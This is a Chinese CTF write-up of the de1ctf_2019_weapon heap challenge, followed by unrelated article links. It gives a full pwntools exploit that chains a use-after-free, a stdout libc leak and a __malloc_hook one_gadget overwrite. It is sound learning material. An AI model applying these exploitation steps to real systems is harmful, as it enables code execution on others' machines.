没做出来,wtcl,看了师傅们的wp才找到思路,收获了很多

怎么说呢,这个题很简单但是很巧妙,逆起来几乎无难度

漏洞点位于free函数,一个简单的UAF漏洞

然后接下来说说我一开始的思路

由于程序没有提供show函数,所以几乎可以确定要打_IO_2_1_stdout_,改掉flag然后泄漏libc

但是add函数里面只能申请小于0x60的chunk,根本找不到残留的unsorted bin留下的指针

然后,然后我就找不到思路了

然后学习了一波师傅们的wp

其实这个除了UAF还有一个小漏洞,就是可以自己申请index,可以申请0-9号的任意index

这就为我们伪造unsorted bin留下了条件

思路,要想拿到unsorted bin的指针,首先我们需要一个0x60的fastbin,然后在相同的位置需要一个unsorted bin,这样fastbin的fd pointer就留下了unsorted bin的fd pointer,就可以攻击_IO_2_1_stdout_了

然后就是常规的hack __malloc_hook

仔细记录一下中间过程

先来伪造一个header,目的:可以改下一个chunk的控制信息

 1 add(0x10,0,'aaaaaaaa')

 2 add(0x10,1,'bbbbbbbb')

 3 add(0x60,2,'cccccccc')

 4 add(0x10,3,'dddddddd')

 5

 6 free(0)

 7 free(1)

 8 free(0)

 9

10 add(0x10,0,p64(0) + p64(0x21))

11 add(0x60,8,'eeeeeeee')

12

13 edit(1,'\x10')

这样我们可以申请到010的位置,从而可以对020这个chunk的header 进行修改,可以先改成0x71,然后free一下,然后再改成一个unsorten bin大小的chunk,再free,这样就有了残留的堆指针

1 add(0x10,1,'aaaaaaaa')

2 add(0x10,4,p64(0) + p64(0x71))

3 edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0

4 free(1)

编辑2号chunk的目的是绕过free时的检查

接下来fast bin拿到unsorted bin的fd指针

1 edit(4,p64(0) + p64(0x91))    # to change the chunk size

2 free(1)    # now , fast fd has connected unsorted bin fd

然后就是常规思路了

申请到'\xdd\x*5'的位置,'*'需要爆破,1/16的概率,直接扔个try except

1 edit(1,'\xdd\x65')

2 edit(4,p64(0) + p64(0x71))    # don't forget to renew size

3 payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags

4 payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller

5 add(0x60,5,'lemon')

6 add(0x60,6,payload

成功泄漏libc,后面就是常规的__malloc_hook - 0x23

 1 libc = ELF('./libc-2.23.so')

 2 _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192

 3 libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']

 4 __malloc_hook = libc_base + libc.sym['__malloc_hook']

 5 one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]

 6 one_gadget = libc_base + one_gadget_list[3]

 7 print "[*] one_gadget:",hex(one_gadget)

 8 add(0x60,5,'lemon')

 9 free(5)

10 payload = 0x13 * 'a' + p64(one_gadget)

11 edit(5,p64(__malloc_hook - 0x23))

12 add(0x60,5,'\x10')

13 add(0x60,0,payload)

14 add(0x20,3,'hack')

15 gdb.attach(p)

16 p.interactive()

完整exp:

  1 from pwn import *

  2

  3 '''

  4 author: lemon

  5 date: 2020-10-16

  6 libc version: libc-2.23.so

  7 '''

  8

  9 local = 1

 10

 11 binary = "./de1ctf_2019_weapon"

 12

 13

 14 def dbg():

 15     context.log_level = 'debug'

 16

 17 context.terminal = ['tmux','splitw','-h']

 18

 19

 20 def add(size,index,content):

 21     p.sendlineafter('choice >> ','1')

 22     p.sendlineafter('wlecome input your size of weapon: ',str(size))

 23     p.sendlineafter('input index:',str(index))

 24     p.sendafter('input your name:',content)

 25

 26 def free(index):

 27     p.sendlineafter('choice >> ','2')

 28     p.sendlineafter('input idx :',str(index))

 29

 30 def edit(index,content):

 31     p.sendlineafter('choice >>','3')

 32     p.sendlineafter('input idx:',str(index))

 33     p.sendafter('new content:',content)

 34

 35 while True:

 36     try:

 37         if local == 1:

 38             p = process(binary)

 39         else:

 40             p = remote("node3.buuoj.cn",26759)

 41         add(0x10,0,'aaaaaaaa')

 42         add(0x10,1,'bbbbbbbb')

 43         add(0x60,2,'cccccccc')

 44         add(0x10,3,'dddddddd')

 45

 46         free(0)

 47         free(1)

 48         free(0)

 49

 50         add(0x10,0,p64(0) + p64(0x21))

 51         add(0x60,8,'eeeeeeee')

 52

 53         edit(1,'\x10')

 54

 55         add(0x10,1,'aaaaaaaa')

 56         add(0x10,4,p64(0) + p64(0x71))

 57

 58         edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0

 59

 60         free(1)

 61

 62         edit(4,p64(0) + p64(0x91))    # to change the chunk size

 63         free(1)    # now , fast fd has connected unsorted bin fd

 64

 65         edit(1,'\xdd\x65')

 66         edit(4,p64(0) + p64(0x71))    # don't forget to renew size

 67

 68         payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags

 69         payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller

 70

 71         add(0x60,5,'lemon')

 72         add(0x60,6,payload)

 73

 74

 75         libc = ELF('./libc-2.23.so')

 76         _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192

 77         libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']

 78

 79         __malloc_hook = libc_base + libc.sym['__malloc_hook']

 80

 81         one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]

 82         one_gadget = libc_base + one_gadget_list[3]

 83         print "[*] one_gadget:",hex(one_gadget)

 84

 85         add(0x60,5,'lemon')

 86         free(5)

 87

 88         payload = 0x13 * 'a' + p64(one_gadget)

 89

 90         edit(5,p64(__malloc_hook - 0x23))

 91         add(0x60,5,'\x10')

 92         add(0x60,0,payload)

 93

 94         add(0x20,3,'hack')

 95

 96         gdb.attach(p)

 97         p.interactive()

 98         break

 99

100     except Exception as e:

101         print(e)

102         p.close()

103         continue

涨知识的一个pwn题:de1ctf_2019_weapon的更多相关文章

  1. pwn200,一道不完全考察ret2libc的小小pwn题

    pwn200 ---XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了 ...

  2. pwn 题GDB调试技巧和exp模板

    GDB分析ELF文件常用的调试技巧 gdb常用命令 首先是gbd+文件名 静态调试 ,gdb attach +文件名 动态调试 为了方便查看堆栈和寄存器 最好是安装peda插件 安装 可以通过pip直 ...

  3. 由一道CTF pwn题深入理解libc2.26中的tcache机制

    本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加 ...

  4. PWN题搭建

    0x00.准备题目 例如:level.c #include <stdio.h> #include <unistd.h> int main(){ char buffer[0x10 ...

  5. 第一解出的pwn题

    虽然题目不难,但是 是我第一次做出的pwn题,得写下. __int64 sub_4007E6() { char s1; // [sp+0h] [bp-30h]@1 memset(&s1, , ...

  6. pwn题命令行解题脚本

    目录 脚本说明 脚本内容 使用 使用示例 参考与引用 脚本说明 这是专门为本地调试与远程答题准备的脚本,依靠命令行参数进行控制. 本脚本支持的功能有: 本地调试 开启tmux调试 设置gdb断点,支持 ...

  7. 攻防世界pwn题:forgot

    0x00:查看文件信息 该文件是32位的,canary和PIE保护机制没开. 0x01:用IDA进行静态分析 总览: 该函数就是:v5初值为1,对v2输入一串字符.然后执行一个会根据输入的字符串而修改 ...

  8. HCTF2018 pwn题复现

    相关文件位置 https://gitee.com/hac425/blog_data/tree/master/hctf2018 the_end 程序功能为,首先 打印出 libc 的地址, 然后可以允许 ...

  9. 百度杯 十一月 的一道pwn题复现

    拿到题后,就直接开鲁.. /ctf/pwn# checksec pwnme [*] '/ctf/pwn/pwnme' Arch: amd64--little RELRO: Full RELRO Sta ...

随机推荐

  1. 从 LRU Cache 带你看面试的本质

    前言 大家好,这里是<齐姐聊算法>系列之 LRU 问题. 在讲这道题之前,我想先聊聊「技术面试究竟是在考什么」这个问题. 技术面试究竟在考什么 在人人都知道刷题的今天,面试官也都知道大家会 ...

  2. Python对象的空间边界:独善其身与开放包容

    导读:Python猫是一只喵星来客,它爱地球的一切,特别爱优雅而无所不能的 Python.我是它的人类朋友豌豆花下猫,被授权润色与发表它的文章.如果你是第一次看到这个系列文章,那我强烈建议,请先看看它 ...

  3. 自定义springboot - starter 实现日志打印,并支持动态可插拔

    1. starter 命名规则: springboot项目有很多专一功能的starter组件,命名都是spring-boot-starter-xx,如spring-boot-starter-loggi ...

  4. 工作流引擎Activiti与SpringBoot2整合--开源软件诞生17

    开源ERP技术整合系列--第17篇 用日志记录"开源软件"的诞生 [点亮星标]----祈盼着一个鼓励 博主开源地址: 码云:https://gitee.com/redragon/r ...

  5. 【题解】X龙珠

    明天好像要考链表今晚笔者来了解下. 题目链接 解: 对于这道题,由于前面要与后面重新连起来,于是我们考虑链表. 我们先正常用链表维护关系.然后,我们从大到小枚举. 对于这个数,如果它后面有数(因为是一 ...

  6. Windows7 提示“无法访问 xxxx,您没有权限访问,请与网络管理员联系请求访问权限”的解决办法

    Windows7 客户端访问提示"无法访问 xxxx,您没有权限访问,请与网络管理员联系请求访问权限"的解决办法

  7. C# 生成chart图表的三种方式

    .net中,微软给我们提供了画图类(system.drawing.imaging),在该类中画图的基本功能都有.比如:直线.折线.矩形.多边形.椭圆形.扇形.曲线等等,因此一般的图形都可以直接通过代码 ...

  8. id+is+深浅co'p'y

    day06 一.id.is 关键字:id #唯一的,如果id相同,说明2个变量指向同一个地址,就是变量一==变量二 注意:id相同值一定相同,值相同但是id不一定相同(不同代码块的值相同,他们就像太阳 ...

  9. python反序列化学习记录

    pickle与序列化和反序列化 官方文档 模块 pickle 实现了对一个 Python 对象结构的二进制序列化和反序列化. "pickling" 是将 Python 对象及其所拥 ...

  10. Linux下clock子系统

    常用API: 1.struct clk *clk_get(struct device *dev, const char *id):从一个时钟list链表中以dev或者字符id名称查找一个时钟clk结构 ...